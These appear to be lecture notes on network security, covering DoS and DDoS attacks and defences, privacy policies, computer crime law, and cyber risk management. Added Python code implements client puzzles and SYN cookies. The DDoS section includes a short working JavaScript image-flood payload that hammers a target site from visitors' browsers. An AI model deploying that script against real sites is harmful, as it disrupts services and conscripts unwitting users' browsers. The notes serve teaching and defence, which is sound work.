Higher Level DoS

SSL/TLS handshake
client RSA encrypt (cheap) -> server RSA decrypt (expensive): a little client work forces much more server work

DoS Mitigation
Client puzzle: slow down attacker
Moderately hard problem: given challenge c, find x such that
-LSB_n(SHA-1(c || x)) = 0^n
Hardness of challenge: n
-decided based on DoS attack volume
Limitations:
-requires changes to both clients and servers
-Hurts low power legitimate clients during attack
CPU power ratio
-high end server / low end cell phone = 8000
-> impossible to scale to hard puzzles
Interesting observation
– Main memory access time ratio
– high end server / low end cell phone = 2
Solution requires many main memory accesses (memory-bound puzzles)
– Dwork-Goldberg-Naor, CRYPTO
– Abadi-Burrows-Manasse-Wobber, ACM TOIT
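Added example (not from the lecture notes): the hash-based client puzzle above, with the server's one-hash verification next to the client's roughly 2^n-hash search, plus a toy policy for picking n from observed load. The tier thresholds in choose_hardness are my assumption, not from the notes.

```python
import hashlib
import itertools
import os


def lsb_zero(digest: bytes, n: int) -> bool:
    """True if the n least-significant bits of the digest are all zero (LSB_n = 0^n)."""
    return int.from_bytes(digest, "big") & ((1 << n) - 1) == 0


def make_challenge() -> bytes:
    """Server side: a fresh random challenge c per connection attempt."""
    return os.urandom(16)


def solve_puzzle(c: bytes, n: int) -> int:
    """Client side: brute-force x until LSB_n(SHA-1(c || x)) = 0^n.
    Expected cost is about 2**n SHA-1 evaluations; this is CPU-bound, which is
    why the 8000x CPU ratio in the notes makes large n unusable for phones."""
    for x in itertools.count():
        if lsb_zero(hashlib.sha1(c + x.to_bytes(8, "big")).digest(), n):
            return x


def verify_solution(c: bytes, x: int, n: int) -> bool:
    """Server side: one hash evaluation checks the client's 2**n of work."""
    return lsb_zero(hashlib.sha1(c + x.to_bytes(8, "big")).digest(), n)


def choose_hardness(syn_rate_per_sec: float) -> int:
    """Toy policy (assumption, not from the notes): scale n with observed request
    volume so legitimate clients pay nothing when no attack is under way."""
    if syn_rate_per_sec < 100:
        return 0
    if syn_rate_per_sec < 1_000:
        return 8
    if syn_rate_per_sec < 10_000:
        return 12
    return 16


if __name__ == "__main__":
    c = make_challenge()
    n = choose_hardness(5_000)
    x = solve_puzzle(c, n)
    print(f"n={n} solved with x={x}, verified={verify_solution(c, x, n)}")
```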

Traceback
-given set of attack packets
-determine path to source
assumption
-most routers remain uncompromised
-attacker sends many packets

TCP

IP header format
-connectionless
-unreliable
-best effort

version, header length, type of service, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source address of originating host, destination address of target host, options, padding, ip data

TCP
-session based, congestion control, in order delivery
source port, dest port, seq number, ack number, flags (URG, ACK, PSH, RST, SYN, FIN), other stuff

TCP handshake
syn: SNc <- rand_c, ANc <- 0
SYN flood
-SYN packets with random source IP addresses
-fills up backlog queue on server
-no further connections possible
A classic SYN flood example: MS Blaster worm (2003)
-SYN flood on port 80 to windowsupdate.com
-50 SYN packets every second, each packet is 40 bytes
-spoofed source IP: a.b.X.Y where X, Y random
Low rate SYN flood defenses
Non-solution
-increase backlog queue size or decrease timeout
Correct solution
-SYN cookies: remove state from server
Massive flood
-command bot army to flood specific target
-20,000 bots can generate 2Gb/sec of SYNs
-at web site: saturates network uplink or network router
-random source IP -> attack SYNs look the same as real SYNs
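Added example (not from the notes): a simplified Bernstein-style SYN cookie, the "remove state from server" defense. The server keeps no per-connection state between SYN and final ACK; the ISN it sends encodes time, MSS and a MAC, and the ACK is validated by recomputation. The MSS table and the 64-second tick are my assumptions; Linux uses its own table and layout.

```python
import hashlib
import hmac
import os

# MSS values encodable in 3 cookie bits (constructed table, not the kernel's).
MSS_TABLE = [536, 1024, 1220, 1300, 1400, 1440, 1460, 8960]


class SynCookieServer:
    """Stateless SYN handling: the ISN in our SYN-ACK *is* the state, so a
    flood of spoofed SYNs has no backlog queue to fill."""

    def __init__(self, secret=None):
        self.secret = secret or os.urandom(32)  # one server-wide secret

    @staticmethod
    def _mss_index(mss):
        idx = 0  # largest table entry not exceeding the client's advertised MSS
        for i, v in enumerate(MSS_TABLE):
            if v <= mss:
                idx = i
        return idx

    def _mac24(self, src, sport, dst, dport, t, mss_idx):
        # 24-bit MAC binding the cookie to the 4-tuple, time tick and MSS bits.
        msg = f"{src}:{sport}>{dst}:{dport}|{t}|{mss_idx}".encode()
        return int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:3], "big")

    def make_cookie(self, src, sport, dst, dport, client_mss, now):
        """On SYN: ISN = 5 bits time tick (64 s units) | 3 bits MSS index | 24 bits MAC."""
        t = (now // 64) & 0x1F
        mss_idx = self._mss_index(client_mss)
        return (t << 27) | (mss_idx << 24) | self._mac24(src, sport, dst, dport, t, mss_idx)

    def check_ack(self, src, sport, dst, dport, ack_number, now):
        """On the final ACK: rebuild the cookie from the packet alone. Returns the
        negotiated MSS, or None if this is not a fresh reply to our SYN-ACK."""
        cookie = (ack_number - 1) & 0xFFFFFFFF  # client ACKs ISN + 1
        t = cookie >> 27
        mss_idx = (cookie >> 24) & 0x7
        age = (((now // 64) & 0x1F) - t) & 0x1F
        if age > 1:  # older than ~2 ticks: reject, bounding replay of captured ACKs
            return None
        if (cookie & 0xFFFFFF) != self._mac24(src, sport, dst, dport, t, mss_idx):
            return None
        return MSS_TABLE[mss_idx]
```

A spoofed-source SYN costs the server one HMAC and no memory; the third packet never arrives from the forged address, so nothing is left behind.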

Idea: only forward established TCP connections to site

Stronger attacks: TCP connection flood
Command bot army
-complete TCP connection to web site
-send short HTTP head request
-repeat

will bypass SYN flood protection proxy but
attacker can no longer use random source IPs
reveals location of bot zombies
proxy can now block or rate-limit bots

Javascript-based DDoS:
popular server (serving imageFlood.js) -> injects imageFlood.js into honest end user's browser -> browser floods github.com

function imgflood() {
	var TARGET = 'victim-website.com/index.php?'
	var rand = Math.floor(Math.random() * 1000)    // random query string defeats caching
	var pic = new Image()
	pic.src = 'http://' + TARGET + rand + '=val'   // each Image load is one HTTP request to the target
}
setInterval(imgflood, 10)                          // one request every 10 ms for as long as the page stays open

DOS Taxonomy

subnet spoofing: Generate random addresses within a given address space
random spoofing: Generate 32-bit numbers and stamp packets with them.
fixed spoofing: The spoofed address is the address of the target.

server application: the attack is targeted to a specific application on a server
network access: the attack is used to overload or crash the communication mechanism of a network
infrastructure: the motivation of this attack is a crucial service of a global internet operation, for example core router

application
-> small number of packets -> big effect
application attacks:
DoS bug: Design flaw allowing one Machine to disrupt a service
DoS flood: Command botnet to generate flood of requests
sample DoS at different layers: link, TCP/UDP, application

Example: Google Privacy Policy

What information is collected about you?
– Personal information like name, email address, credit card, telephone number etc. that we provide to create an account.
– Services we use and websites we visit. Used for advertising.
– Device information: hardware model, OS, network information(IP address) etc.
– Search queries
– Who we call? How long we talk?
– Cookies
– Location information
– Applications

How is collected information used?
improve user experience (personalization)
for serving you targeted advertisements – we can set ad preferences

Who do they share it with?
with opt-in, can share with companies, individuals and organizations outside of Google.
Domain administrators and resellers who provide user support to your organization can get certain information about you that you give to Google.
Affiliates and other trusted businesses or persons with appropriate confidentiality and security measures.
For legal reasons.

Information security
-many services use encryption
-stronger authentication(two factor)
-Other safeguards

Changes to privacy policy
-Will not reduce user rights without your consent

Facebook Privacy Policies
Do companies adhere and operate according to the privacy policy you gave consent to?
Not really, Facebook had issues and actually the US Federal Trade Commission went after it for violation of user privacy.

Privacy

Do we need privacy only for individuals?
Universities, hospitals, charities require privacy and need to protect data of people they serve or have as employees.

Threats to Privacy
-Traffic analysis
-Surveillance
-Linking and making inferences

social media, tracking of web browsing, location aware applications, sometimes we are willing parties.

Privacy Threats to Online Tracking Info
-collection of information about you – with or without your consent?
-Usage – only used for specified purpose you agreed to?
-Information retention – how long can they keep it?
-Information disclosure and sharing -disclosed to only authorized or agreed to parties?
-Privacy policy change – can information collector/holder change to a more lax policy without your agreement?
-Information security – identity and access management, monitoring, secure against various threats we discussed.

Ethical Issues

Difference between law and ethics
– individual standard vs. societal
– No external arbiter and enforcement unlike law
– Examples – What do you do when you discover a vulnerability in a commercial product? Ethical disclosure?
– Code of ethical conduct(IEEE, ACM, university)

Privacy
Definition: A user’s ability to control how data pertaining to him/her can be collected, used and shared by someone else.

Privacy is not a new problem
– people have always worried about what others(friends, enemies, governments) might know about what they do.
– Scale and magnitude at which information about us and our activities can be collected, ways in which it can be used, and shared or sold.

Privacy
– financial statements, credit card statements, banking records etc.
– Health/medical conditions
– legal matters
– biometrics
– political beliefs
– school and employer records
– web browsing habits? what do we search, what do we browse? websites we visit?
– Communication(emails and calls)
– Past history(right to be forgotten)

What is not private?
Where I live? My citizenship?
Am I registered to vote?
My salary (state employee, because Georgia Tech is a public university)

Law, Ethics, and Privacy

Cyber crime
– data theft, identity theft, extortion etc.
Copying and distribution of digital objects (software, music)
– copyright, patents, trade secrets
– how are these applicable in the context of digital/computer objects?
Privacy
– Who can collect my information, how can I control it, how could it be used etc.?

US Computer Fraud and Abuse Act(CFAA)
– Defines criminal sanctions against various types of abuse
– Unauthorized access to computer containing:
– data protected for national defense
– banking or financial information
– Unauthorized access, use, modification, destruction, disclosure of computer or information on a system operated by or on behalf of US govt.

US Computer Fraud and Abuse Act
– Accessing without permission a protected computer(any computer connected to the internet)
– Transmitting code that causes damage to computers (malware)
– Trafficking in computer passwords

Cyber Risk Assessment

– Investments in cyber security are driven by risk and how certain controls may reduce it
– Some risk will always remain
– How can risk be assessed?

Risk exposure = Prob[adverse security event] * Impact[adverse event]
Risk leverage = (risk exposure before/without the control - risk exposure after the control) / cost of control

Risk leverage > 1 for the control to make sense

How do we assess and reduce cyber risk?
impact
– expected loss(reputational, recovery and response, legal, loss of business etc.)
Risk management
– accept, transfer(insurance) and reduce
– reduction via technology solutions, education and awareness training

Enterprise Cyber Security Posture
– Reactive
– regulation/compliance
– customer demands
– in response to a breach(Target or Home Depot)
– In response to events

Proactive:
– champion of an organization who has influence
– board level conversation about cyber security and risk

Economic value argument:
– return on investment(RoI)
– Estimating costs and benefits is tricky
– Perception vs. data-driven risk

Values at risk
– assets, reputation etc.
Threats and attack vectors
Plan, implement and manage
– Deploy appropriate controls
– Empower people and hold them responsible
– Plan for response and remediation (do not be surprised)
– User awareness
Understand and proactively address risk

Security Planning

What needs to be secured?
Who is responsible for it?
What technical/non-technical control should be deployed?
How are people supported to do what they need to do?
What if something goes wrong?
Response and recovery
Accountability and consequences

What needs to be secured?
Hardware, software and services
– servers, routers, switches, laptops and mobile devices
– OS, databases, services and applications
– Data stored in databases or files
From whom?
– Remote hackers?
– Insiders?

Identity and access management (IAM)
– Credentialing, account creation and deletion
– password policies
Network and host defenses
– firewall, IDS, IPS
– Anti-virus
VPN and BYOD
Vulnerability patching
User awareness and education
– Phishing attack awareness (PhishMe)

High level articulation of security objectives and goals
– legal, business or regulatory rationale
– Do’s and don’ts for users
password length
Web and email policies
Response to security events
– Address prevention, detection, response and remediation as it concerns/impacts users

Cyber Security Management

Management Security
-Technical controls (authentication, access control etc.) are used to reduce the risk of attacks on valuable assets.
What assets need to be secured and from whom.

Organization Context
legal and compliance drivers for cyber security
financial and health data
what technical control should be deployed?
must understand risks posed by threats
costs and benefits of security measures

Key Challenges
what assets are under risk?
What are the threats and how serious is the risk posed by them?
likelihood of successful attack and its impact

What technological solutions/controls exist to counter threats?
How can we address risk in a cost-effective manner?
cost is less than reduction in risk
How do we understand people and process aspects of cyber security management?